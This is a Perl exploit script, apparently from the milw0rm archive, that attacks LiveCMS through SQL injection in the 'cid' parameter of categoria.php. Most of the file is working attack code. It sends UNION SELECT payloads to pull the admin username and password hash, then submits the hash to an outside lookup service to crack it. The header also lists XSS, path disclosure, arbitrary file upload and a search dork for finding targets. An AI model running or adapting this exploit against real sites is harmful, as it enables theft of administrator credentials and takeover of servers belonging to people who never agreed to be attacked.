LiveCMS 3.4 - 'categoria.php?cid' SQL Injection

#!/usr/bin/perl
##############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
###############################################################################################
#INFO:
#Program Title ################################################################################
#LiveCMS <= 3.4 SQL Injection, Absolute Path Disclosure, XSS Injection, Arbitrary File Upload
#
#Description ##################################################################################
#This is a free CMS system.
#
#Script Download ##############################################################################
#http://sourceforge.net/project/downloading.php?group_id=78735&use_mirror=ufpr&filename=livecms-3.4.tar.gz&12060460
#http://livecms.com
#
#Original Advisory #############################################################################
#http://www.g00ns-forum.net/showthread.php?t=9350
#
#Exploit #######################################################################################
#credz to Vipsta and Clorox for vulnerability
#[c]ode by TrinTiTTY (2007) www.g00ns.net
#shoutz: z3r0, milf, blackhill, godxcel, murderskillz, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, c0ma, sick, trin, a59, seven, fury, <S>, Bernard, and everyone else at g00ns.net
#
#Details #######################################################################################                              
#APD: The absolute path is disclosed in a mysql error when categoria.php's paramater cid is queried with a non-defined
#variable. example: categoria.php?cid='
#XSS: Article names are not properly santised, a user could insert malicious javascript
#AFU: Articles can have a small image that is uploaded with them, however LiveCMS fails to restrict what file types
#can be uploaded.  A user could upload a malicious script with this method and compromise the server.
#GoogleDork: "powered by livecms"
#
################################################################################################
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
#                LiveCMS <= 3.3  [ categoria.php ]               #
#                    ] Remote SQL Injection [                    #
#                                                                #
#              [c]ode by TrinTiTTY [at] g00ns.net                #
#              Vulnerability by Vipsta and Clorox                #
#                                                                #
#                                                                #
#  [irc.g00ns.net]       [www.g00ns.net]        [ts.g00ns.net]   #
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#

use LWP;

$host = @ARGV[0];
$ua = LWP::UserAgent->new;

my $uject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,user,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';
my $pject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,pass,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';

if (@ARGV < 1){&top( );&usage( )}
elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );}
else { &getUser( ) }



sub getUser( ) {
  system("color 4");
  &top( );
  print "\n [~] Retrieving admin username\n";
  $nameres = $ua->get("http://$host/$uject");

  $namecon = $nameres->content;

  if ($namecon =~ /<td>(.*)a href=\"(.*)\"(.*)>(.*)<\/a><\/td>/gmi)
  {
     $user = $4;
     print "\n [+] Admin user retrieved: $user\n";
     print "\n [~] Retrieving password for $user\n";
     getPass( )
  }
  else {
      print "\n [-] Unable to retrieve admin username\n";
      print "\n [~] Retrieving password\n";
      getPass( )
  }
}

sub getPass( ) {

  $passres = $ua->get("http://$host/$pject");

  $passCon = $passres->content;

  if ($passCon =~ /<td>(.*)a href=\"(.*)\"(.*)>([a-f0-9]{32})<\/a><\/td>/gmi)
  {
     $pass = $4;
     print "\n [+] Admin password retrieved: $pass\n";
     &resolveHash($pass);
     system("color 7");
  }
  else {
      print "\n [-] Unable to retrieve admin password\n";
      system("color 7");
      exit(0);
  }
}

sub resolveHash($)
{
  print "\n [~] Attempting to resolve hash\n";
  $hashget = LWP::UserAgent->new;  #thx gdata
  $resp = $hashget->get("http://gdataonline.com/qkhash.php?mode=txt&hash=$_[0]"); # checks gdata for hash
  $hashans = $resp->content;
  if ($hashans =~ m\width="35%"><b>([  -_a-z0-9.*?&=;<>/""]{1,25})</b></td>\){
     $crack = $1;
     print "\n [+] Password hash resolved: $crack\n";
     system("color 7");
     exit(0);
  }
  else {
     print "\n [-] Couldn't resolve hash\n";
     system("color 7");
     exit(0);
  }
}
sub top( )
{
  print q {
  ##################################################################
  #                LiveCMS <= 3.3  [ categoria.php ]               #
  #                    ] Remote SQL Injection [                    #
  #                                                                #
  #                [c]ode by TrinTiTTY [at] g00ns.net              #
  #                Vulnerability by Vipsta and Clorox              #
  ##################################################################
  }
}
sub usage( )
{
  print "\n Usage: perl livecms33.pl <host>\n";
  print "\n Example: perl livecms33.pl www.example.com/path\n\n";
  exit(0);
}

# milw0rm.com [2007-06-20]